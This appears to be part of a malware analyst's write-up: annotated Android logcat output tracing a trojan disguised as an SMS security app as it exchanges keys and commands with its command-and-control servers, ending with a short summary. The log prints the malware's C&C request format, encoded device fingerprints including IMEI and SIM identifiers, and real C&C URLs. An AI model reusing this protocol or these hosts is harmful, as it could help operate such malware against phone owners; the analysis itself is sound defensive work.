11-17 12:31:32.425: D/[SmsSecure]:Gate:sendRequest(24738): sAonlknnhW4NQgFgxkS+ylGeZwb1Lb14gkStO8XdeKNoC1Lkptig7Dbp9rIrGHAR
11-17 12:31:32.425: D/[SmsSecure]:Gate:sendRequest(24738): KspzNN+mvIo22OikBNBsBReQSpfo4+RyGqyQrfEtQz8nFgqw79WtxYVt2MAGhsuz
11-17 12:31:32.425: D/[SmsSecure]:Gate:sendRequest(24738): ZW5p53TtKu0gaL5SWQiYF6jRODPIlmwsl52zhISON95zUiQC/lj8KxLunzIIowFF
11-17 12:31:32.425: D/[SmsSecure]:Gate:sendRequest(24738): 5J0wtg2wa+U60+R4PODt3YglM1VtKD+rkjjsfQrMBQlRw7z6OnDzHj0TD2GE4kI/
11-17 12:31:32.425: D/[SmsSecure]:Gate:sendRequest(24738): 6Ni75DGX6Nr4aGTRwBgCnM8+cIIpasy+TCTLudDMOWsIuLDI3bJtRbxVrISw2MaX
11-17 12:31:32.425: D/[SmsSecure]:Gate:sendRequest(24738): MzL50Y32A8FqdB2XjJxKf7LDAHq+/uKa8KPZC1MCOP/VCjXN9yJqzEzCnQ/hbvqP
11-17 12:31:32.425: D/[SmsSecure]:Gate:sendRequest(24738): s7BvmbBs0cBIg4tm/ToOYd1owIjZNEALfpOyD57AZqqQoaRtGeb5FsYsZ4wi7G1c
11-17 12:31:32.425: D/[SmsSecure]:Gate:sendRequest(24738): n48RJgarerA4a3wkK042fWMCAwEAAQ==
11-17 12:31:32.425: D/[SmsSecure]:Gate:sendRequest(24738): -----END PUBLIC KEY----- -> Final string from the public key
11-17 12:31:32.457: D/[SmsSecure]:Gate:getKey(24738): Key:
11-17 12:31:32.457: D/[SmsSecure]:Gate:getKey(24738): -----BEGIN PUBLIC KEY----- -> The 'key' field in the XML configuration file is setup with the public key received.
11-17 12:31:32.457: D/[SmsSecure]:Gate:getKey(24738): MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA2ukQOm/tVXksvZwnbHgr
11-17 12:31:32.457: D/[SmsSecure]:Gate:getKey(24738): ZwbqyMl0A6QKobSfpku1qI15/p73bXl2K/loHcohfpnXBLpbka0uUBjU2qWiYkKb
11-17 12:31:32.457: D/[SmsSecure]:Gate:getKey(24738): 1zzgruzShUFUEeExkWck1Qz5dz4/i0uBlJ3z57LV/EnW8+sXsUEDp5AbKQ79Agxe
11-17 12:31:32.457: D/[SmsSecure]:Gate:getKey(24738): YAdLzs+UITAX5NIOmM+ktX79N/E9osBCcFfrVXDTt658EUvVSGGdoWF/Ey3x0LwX
11-17 12:31:32.457: D/[SmsSecure]:Gate:getKey(24738): sAonlknnhW4NQgFgxkS+ylGeZwb1Lb14gkStO8XdeKNoC1Lkptig7Dbp9rIrGHAR
11-17 12:31:32.457: D/[SmsSecure]:Gate:getKey(24738): KspzNN+mvIo22OikBNBsBReQSpfo4+RyGqyQrfEtQz8nFgqw79WtxYVt2MAGhsuz
11-17 12:31:32.457: D/[SmsSecure]:Gate:getKey(24738): ZW5p53TtKu0gaL5SWQiYF6jRODPIlmwsl52zhISON95zUiQC/lj8KxLunzIIowFF
11-17 12:31:32.457: D/[SmsSecure]:Gate:getKey(24738): 5J0wtg2wa+U60+R4PODt3YglM1VtKD+rkjjsfQrMBQlRw7z6OnDzHj0TD2GE4kI/
11-17 12:31:32.457: D/[SmsSecure]:Gate:getKey(24738): 6Ni75DGX6Nr4aGTRwBgCnM8+cIIpasy+TCTLudDMOWsIuLDI3bJtRbxVrISw2MaX
11-17 12:31:32.457: D/[SmsSecure]:Gate:getKey(24738): MzL50Y32A8FqdB2XjJxKf7LDAHq+/uKa8KPZC1MCOP/VCjXN9yJqzEzCnQ/hbvqP
11-17 12:31:32.457: D/[SmsSecure]:Gate:getKey(24738): s7BvmbBs0cBIg4tm/ToOYd1owIjZNEALfpOyD57AZqqQoaRtGeb5FsYsZ4wi7G1c
11-17 12:31:32.457: D/[SmsSecure]:Gate:getKey(24738): n48RJgarerA4a3wkK042fWMCAwEAAQ==
11-17 12:31:32.457: D/[SmsSecure]:Gate:getKey(24738): -----END PUBLIC KEY-----
11-17 12:31:32.478: D/[SmsSecure]:myFunctions:getSecond(24738): use_url_main=http://www.ableitner.co.at/manufaktur/main.php
11-17 12:31:32.499: D/[SmsSecure]:Gate:sendRequest(24738): sInput=a:4:{s:6:"device";s:738:"QXBwTmFtZT1aS0IgU21zU2VjdXJpdHk7ClZlcnNpb249My4xMDsKOwpEZWZhdWx0QXBwPU5vOwpB
11-17 12:31:32.499: D/[SmsSecure]:Gate:sendRequest(24738): ZG1pbj1ObzsKU2ltU3RhdGU9UkVBRFk7ClNpbUNvdW50cnlDb2RlPWNoOwpTaW1PcGVyYXRvckNv
11-17 12:31:32.499: D/[SmsSecure]:Gate:sendRequest(24738): ZGU9MjI4NTQ7ClNpbU9wZXJhdG9yTmFtZT1MeWNhbW9iaWxlOwpTaW1TZXJpYWxOdW1iZXI9ODk0
11-17 12:31:32.499: D/[SmsSecure]:Gate:sendRequest(24738): MTU0MDAxMDAyODU4MDgyMDsKUGhvbmVOdW1iZXI9OwpEZXZpY2VJTUVJPTM1ODI0MDA1MTkzMjU2
11-17 12:31:32.499: D/[SmsSecure]:Gate:sendRequest(24738): NDsKU3Vic2NyaWJlcklkPTIyODU0MDAwMjg1ODA4MjsKTkVUV09SSz13aWZpOwpCUkFORD1nb29n
11-17 12:31:32.499: D/[SmsSecure]:Gate:sendRequest(24738): bGU7CkZJTkdFUlBSSU5UPWdvb2dsZS9oYW1tZXJoZWFkL2hhbW1lcmhlYWQ6NS4xLjEvTE1ZNDhJ
11-17 12:31:32.499: D/[SmsSecure]:Gate:sendRequest(24738): LzIwNzQ4NTU6dXNlci9yZWxlYXNlLWtleXM7Ck1BTlVGQUNUVVJFUj1MR0U7Ck1PREVMPU5leHVz
11-17 12:31:32.499: D/[SmsSecure]:Gate:sendRequest(24738): IDU7ClBST0RVQ1Q9aGFtbWVyaGVhZDsKT1NfSW5mbz1vcy5uYW1lOiBMaW51eCB8IG9zLmFyY2g6
11-17 12:31:32.499: D/[SmsSecure]:Gate:sendRequest(24738): IGFybXY3bCB8IG9zLnZlcnNpb246IDMuNC4wLWdiZWJiMzZiIHwgamF2YS52ZW5kb3I6IFRoZSBB
11-17 12:31:32.499: D/[SmsSecure]:Gate:sendRequest(24738): bmRyb2lkIFByb2plY3QgfCBqYXZhLnZlcnNpb246IDA=
11-17 12:31:32.499: D/[SmsSecure]:Gate:sendRequest(24738): ";s:3:"cmd";s:3:"rep";s:3:"rid";s:2:"25";s:4:"data";s:0:"";} -> New command sent to the C&C
11-17 12:31:32.499: D/[SmsSecure]:Gate:sendRequest(24738): Using crypt: SSL -> it uses SSL now to communicate with the C&C (using the public key stored)
11-17 12:31:33.248: D/[SmsSecure]:Gate:sendRequest(24738): Response=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
11-17 12:31:33.292: D/[SmsSecure]:Gate:sendRequest(24738): Response=<?xml version="1.0" encoding="utf-8"? > The response for the server. This is a new XML, however the C&C remains the same.
11-17 12:31:33.292: D/[SmsSecure]:Gate:sendRequest(24738):           <config>
11-17 12:31:33.292: D/[SmsSecure]:Gate:sendRequest(24738):             <data rid="25" 
11-17 12:31:33.292: D/[SmsSecure]:Gate:sendRequest(24738):                   shnum10="5556" shtext10="txt10ue" shnum5="2858" shtext5="txt5ue" shnum3="9151" shtext3="txt3ue" shnum1="8151" shtext1="txt1ue" 
11-17 12:31:33.292: D/[SmsSecure]:Gate:sendRequest(24738):                   del_dev="0" 
11-17 12:31:33.292: D/[SmsSecure]:Gate:sendRequest(24738):                   url_main="http://www.mgattiswil.ch/stadl/main.php;http://www.ableitner.co.at/manufaktur/main.php" 
11-17 12:31:33.292: D/[SmsSecure]:Gate:sendRequest(24738):                   url_data="" 
11-17 12:31:33.292: D/[SmsSecure]:Gate:sendRequest(24738):                   url_sms="" 
11-17 12:31:33.292: D/[SmsSecure]:Gate:sendRequest(24738):                   url_log="" 
11-17 12:31:33.292: D/[SmsSecure]:Gate:sendRequest(24738):                   phone_number="" 
11-17 12:31:33.292: D/[SmsSecure]:Gate:sendRequest(24738):   
11-17 12:31:33.292: D/[SmsSecure]:Gate:sendRequest(24738):  download_domain="ttt" 
11-17 12:31:33.292: D/[SmsSecure]:Gate:sendRequest(24738):                   ready_to_bind="0" />
11-17 12:31:33.292: D/[SmsSecure]:Gate:sendRequest(24738):             
11-17 12:31:33.292: D/[SmsSecure]:Gate:sendRequest(24738):           </config>
11-17 12:31:33.292: D/[SmsSecure]:myFunctions:getSecond(24738): Resp=<?xml version="1.0" encoding="utf-8"?>
11-17 12:31:33.292: D/[SmsSecure]:myFunctions:getSecond(24738):           <config>
11-17 12:31:33.292: D/[SmsSecure]:myFunctions:getSecond(24738):             <data rid="25" 
11-17 12:31:33.292: D/[SmsSecure]:myFunctions:getSecond(24738):                   shnum10="5556" shtext10="txt10ue" shnum5="2858" shtext5="txt5ue" shnum3="9151" shtext3="txt3ue" shnum1="8151" shtext1="txt1ue" 
11-17 12:31:33.292: D/[SmsSecure]:myFunctions:getSecond(24738):                   del_dev="0" 
11-17 12:31:33.292: D/[SmsSecure]:myFunctions:getSecond(24738):                   url_main="http://www.mgattiswil.ch/stadl/main.php;http://www.ableitner.co.at/manufaktur/main.php" 
11-17 12:31:33.292: D/[SmsSecure]:myFunctions:getSecond(24738):                   url_data="" 
11-17 12:31:33.292: D/[SmsSecure]:myFunctions:getSecond(24738):                   url_sms="" 
11-17 12:31:33.292: D/[SmsSecure]:myFunctions:getSecond(24738):                   url_log="" 
11-17 12:31:33.292: D/[SmsSecure]:myFunctions:getSecond(24738):                   phone_number="" 
11-17 12:31:33.292: D/[SmsSecure]:myFunctions:getSecond(24738):   
11-17 12:31:33.292: D/[SmsSecure]:myFunctions:getSecond(24738):  download_domain="ttt" 
11-17 12:31:33.292: D/[SmsSecure]:myFunctions:getSecond(24738):     ...
CONF] Get config data from server
11-17 12:31:33.304: D/[SmsSecure]:myFunction.isHasBuffer(24738): use_url_main='http://www.ableitner.co.at/manufaktur/main.php'
11-17 12:31:33.304: D/[SmsSecure]:myFunction.isHasBuffer(24738): use_url_main.length()='46'
11-17 12:31:33.365: D/[SmsSecure]:myFunctions:sendLog(24738): [DATA] Send data to server
11-17 12:31:33.365: D/[SmsSecure]:myFunction.isHasBuffer(24738): use_url_main='http://www.ableitner.co.at/manufaktur/main.php'
11-17 12:31:33.365: D/[SmsSecure]:myFunction.isHasBuffer(24738): use_url_main.length()='46'
11-17 12:31:33.388: D/[SmsSecure]:Gate:sendRequest(24738): sInput=a:4:{s:6:"device";s:738:"QXBwTmFtZT1aS0IgU21zU2VjdXJpdHk7ClZlcnNpb249My4xMDsKOwpEZWZhdWx0QXBwPU5vOwpB
11-17 12:31:33.388: D/[SmsSecure]:Gate:sendRequest(24738): 
11-17 12:31:33.388: D/[SmsSecure]:Gate:sendRequest(24738): IGFybXY3bCB8IG9zLnZlcnNpb246IDMuNC4wLWdiZWJiMzZiIHwgamF2YS52ZW5kb3I6IFRoZSBB
11-17 12:31:33.388: D/[SmsSecure]:Gate:sendRequest(24738): bmRyb2lkIFByb2plY3QgfCBqYXZhLnZlcnNpb246IDA=
11-17 12:31:33.388: D/[SmsSecure]:Gate:sendRequest(24738): ";s:3:"cmd";s:3:"log";s:3:"rid";s:2:"25";s:4:"data";s:72:"a:2:{s:7:"LogCode";s:4:"CONF";s:7:"LogText";s:19:"Check pull off urls";}";} More C&C commands.
11-17 12:31:33.388: D/[SmsSecure]:Gate:sendRequest(24738): Using crypt: SSL
11-17 12:31:33.955: D/[SmsSecure]:Gate:sendRequest(24738): Response=4iImyVpz5T6kkYdmGKz59Wna1u0CcP+kPRJGTeg9RNfCWAqSOvh/ev0U1Y8


Summary

With this approach it is very easy to see the whole life cycle of the malware. I can see how the APK is displayed in the SMS application, how it is downloaded, how it communicates with the C&C, etc. 

In this case, I can see the malware tries to connect to the first C&C URL, but this fails (the response is not the 'OK' the malware is expecting). Then it successfully connects with the second URL which permits to request the public key used to encrypt the communication.
During this process I can see how configuration XML file is adapted with the new information.